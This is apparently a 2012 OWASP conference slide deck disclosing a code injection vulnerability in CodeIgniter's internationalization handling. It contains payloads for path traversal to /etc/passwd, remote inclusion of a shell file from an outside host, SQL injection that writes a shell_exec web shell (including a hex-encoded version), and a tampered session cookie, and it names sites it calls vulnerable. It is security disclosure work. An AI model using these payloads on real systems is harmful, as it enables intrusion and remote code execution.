This document discusses a code injection vulnerability in the internationalization (i18n) functionality of the CodeIgniter PHP web framework. Specifically, it shows how an attacker could exploit weaknesses in CodeIgniter's handling of localized language files to perform remote file inclusion (RFI) or local code inclusion attacks. The document provides examples of how an attacker could craft malicious input to include arbitrary files or code from remote or local systems. It also notes that over 240 existing CodeIgniter sites were found potentially vulnerable to this issue. In conclusion, the document invites questions and feedback on this CodeIgniter i18n code injection vulnerability.

1. 20 May 2012
CodeIgniter
i18n Code Injection
Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member
abbas.naderi@owasp.org / me@abiusx.com

2. Understand the Context

3. PHP
• Mostly used SSI (75%)
• 17 Years Maturity
• Open Source Nature
• Rapid Develop/Deploy
• Secure Core
• Insecure Libraries
• Low Level Web Development *

4. PHP Frameworks
• PHP low level web support
• Incorporation of Frameworks
• Much Used and Mature -> Secure
• Huge Codebase -> Insecure
• Developers, not Security guys
• Security-Oriented Frameworks (OWASP
ESAPI)

5. CodeIgniter
• Most used Mid-level Framework

6. Internationalization
• i18n importance today
• Difficult implementation:
– File-based (Wordpress, eFront, …)
– Database (jFramework)
– Code-based (CodeIgniter, …)
• Obsolete consumers -> No testing

7. Remote File Inclusion

8. RFI at a glance
• 3rd Most Common Vuln. in Top Ten
2007 : Malicious File Inclusion
• Not in Top Ten 2010 : Mostly
Understood and Fixed
• Highest Impact (Run Arbitrary Code!)
• Common on Interpreted Languages
• Most Common in PHP (Why?)

9. RFI Example
<?php
$page = $_GET[„page‟];
include “./pages/{$page}.php”;
Malicious Input:
Mysite.com?page=../../../etc/passwd%00
Where current dir is /var/www
include “/var/www/pages/../../../etc/passwd”;
= include “/etc/passwd”; //show it on screen

10. RFI Cheatsheet
Use null character on input to terminate string:
include “./{$page}.you.cant.rfi.me.php”;
Use absolute paths if input initiates include:
include “{$_GET[‘page’]}”;
page=http://abx.ir/shell.txt%00

11. allow_url_include

13. Filter Parameters
• CodeIgniter has the least found exploits on all
major PHP frameworks (Commercial Codebase)
• CodeIgniter filters dangerous characters such as ‘
, “, /, ?, <, > on GET parameters, to prevent most
XSS and Injection attacks.
• CodeIgniter has central module loader, and MVC
pattern, preventing most RFIs.

14. Internationalization

15. Internationalization (II)

17. Local File Inclusion
• Useful to extract info. from target
system
– /etc/passwd
– ./config/database.php
• Easy to exploit

18. Local Code Inclusion
• Requires a blind injection:
– „” and 1=0 union select “<?php echo shell_exec($_REQUEST[q]);
into outfile “/tmp/sales_lang.php” --
– CodeIgniter filters <? From input
– „ and 1=0 union select
unhex(“3c3f706870206563686f207368656c6c5f6578656328245f
524551554553545b715d29″) into outfile
“/tmp/common_lang.php” --
– Caution: into outfile does not overwrite!
– Where to find blind injection?

19. Local Code Inclusion (II)
• Now change cookie from
– a%3A8%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22aa55f87c8b18
afe75b3cd7baba330553%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%
22178.162.154.251%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22M
ozilla%2F5.0+%28Macintosh%3B+Intel+Mac+OS+X+10.7%3B+rv%3A12%22%3Bs%3
A13%3A%22last_activity%22%3Bs%3A10%3A%221337541932%22%3Bs%3A3%3A
%22lan%22%3Bs%3A1%3A%221%22%3Bs%3A3%3A%22dir%22%3Bs%3A3%3A%
22rtl%22%3Bs%3A4%3A%22lang%22%3Bs%3A2%3A%22fa%22%3Bs%3A3%3A%
22alg%22%3Bs%3A5%3A%22right%22%3B%7Db3c9bed5e9656eca61938c9bc6965b
ad
– To lang%22%3Bs%3A2%3A%22../../../../../tmp

20. Remote Code Inclusion
• Look at the code:
include($package_path.'language/'.$idiom.'/'.$langfile);
• You a hacker? tell me how!

21. Remote Code Inclusion (II)
$this->load->add_package_path()
Adding a package path instructs the Loader class to
prepend a given path for subsequent requests for
resources. As an example, the "Foo Bar" application
package above has a library named Foo_bar.php. In
our controller, we'd do the following:
$this->load->add_package_path(APPPATH.'third_party/foo_bar/');
http://codeigniter.com/user_guide/libraries/loader.html

22. Demonstration

24. CodeIgniter + i18n
• More than 240 sites discovered:
– http://www.sedoparking.com
– http://bambooinvoice.org/
– http://www.haughin.com/
– http://www.rapyd.com/
– http://code-igniter.ru/
• And tons more…

25. Questions?
Feedback?
Abbas Naderi (aka AbiusX)
OWASP Chapter Leader of Iran
ISSECO Member
abiusx@acm.org / me@abiusx.com